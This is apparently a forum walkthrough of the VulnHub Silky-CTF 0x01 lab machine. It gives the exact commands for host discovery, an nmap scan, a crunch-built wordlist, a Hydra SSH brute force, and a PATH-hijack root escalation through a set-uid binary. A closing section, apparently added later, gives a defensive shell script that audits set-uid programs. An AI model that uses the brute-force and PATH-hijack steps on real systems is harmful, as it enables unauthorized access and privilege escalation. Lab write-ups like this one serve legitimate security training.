Hi TurkHackTeam Family, today I'll show you "How to Solve the Silky-CTF: 0x01 Vulnerable Machine".
https://www.vulnhub.com/entry/silky-ctf-0x01,306/
Machine Name: Silky-CTF: 0x01
Release Date: 27 April 2019
Author: Silky
Series: Silky-CTF
Description: Find the Flag on Target's Root directory
File Size: 2.5 GB
Operating System: Linux
Difficulty: Easy-Medium
First of all, to learn the machine's IP address, type:
Code:
sudo netdiscover
With this, we learned the IP address of our target.
To learn which ports are open with an NMAP scan, type:
Code:
nmap -A IP_ADDRESS
As you can see, ports 22 and 80 are open, and what is important here is robots.txt and notex.txt, which I highlighted in blue.
I understood there was a website because port 80 is open. When I go to the website, I can see it is an Apache-based website.
First, I went to robots.txt; it forwarded me to notex.txt. There is a text in German.
When we translate it, I see this message: "I absolutely have to remove the password from the page, after all, the last 2 characters are missing. But still."
Next, I went back to the website, looked at the code, and found something in the "script.js" file.
As you can see, we found some values related to the password.
"The password's last 2 letters are missing" gave us a hint.
I'll create a password list with the crunch tool.
Code:
crunch 7 7 -t s1lKy^% >> password.txt
I typed this in the terminal and the password list was created.
We'll brute-force the SSH service with the Hydra tool; type the following command in the terminal:
Code:
hydra -l silky -P password.txt IP_ADDRESS ssh
Now we got the password.
To connect over SSH, type:
Code:
ssh silky@IP_ADDRESS
I searched for files with the SUID bit set, and the /usr/bin/sky file caught my eye.
Code:
/usr/bin/sky
I ran this and saw some German text and the word root.
I already ran the whoami command.
To escalate to root, I'll use the PATH variable. For this:
Code:
echo '/bin/sh' > whoami
chmod 777 whoami
export PATH=/tmp:$PATH
/usr/bin/sky
Funnily enough, I didn't get root escalation when typing "id".
Code:
cd /root
But when I typed the above command, I didn't get any permission error and got my flag.
/Translation Club M3m0ry\
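For defenders, the finding in this walkthrough is an unreviewed set-uid program that launches a command by bare name, so the caller's PATH decides what runs as root. The following is an added example, not part of the original post: it lists set-uid files outside a reviewed allowlist and flags embedded command names that carry no path. `TRUSTED_DIRS`, the function names and the allowlist file are assumptions of this example.

```shell
#!/bin/sh
# Added example, not from the original post. Heuristic triage only: a hit means
# "review how this program launches the command", not proof of a flaw.

# Directories a privileged program should resolve commands from (assumed default).
TRUSTED_DIRS="${TRUSTED_DIRS:-/usr/sbin /usr/bin /sbin /bin}"

# True if NAME exists as an executable file in one of the trusted directories.
is_system_command() {
    for d in $TRUSTED_DIRS; do
        if [ -f "$d/$1" ] && [ -x "$d/$1" ]; then return 0; fi
    done
    return 1
}

# Print embedded tokens in FILE that look like a command name without a path.
bare_commands() {
    LC_ALL=C tr -cs 'A-Za-z0-9_./-' '\n' < "$1" |
        grep -E '^[a-z][a-z0-9_-]+$' | sort -u |
        while read -r w; do
            if is_system_command "$w"; then echo "$w"; fi
        done
}

# Report "path: command" for every set-uid file under DIR not in ALLOWLIST
# (a file with one reviewed path per line).
audit_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort |
        while read -r f; do
            if grep -Fxq "$f" "$2" 2>/dev/null; then continue; fi
            bare_commands "$f" | while read -r w; do echo "$f: $w"; done
        done
}

# Usage: audit_suid /usr/bin /etc/suid-allowlist   (allowlist path is hypothetical)
```

Imported library symbol names that happen to match command names will show up as false positives, so treat each hit as a prompt to check whether the program calls the command through an absolute path with a fixed environment.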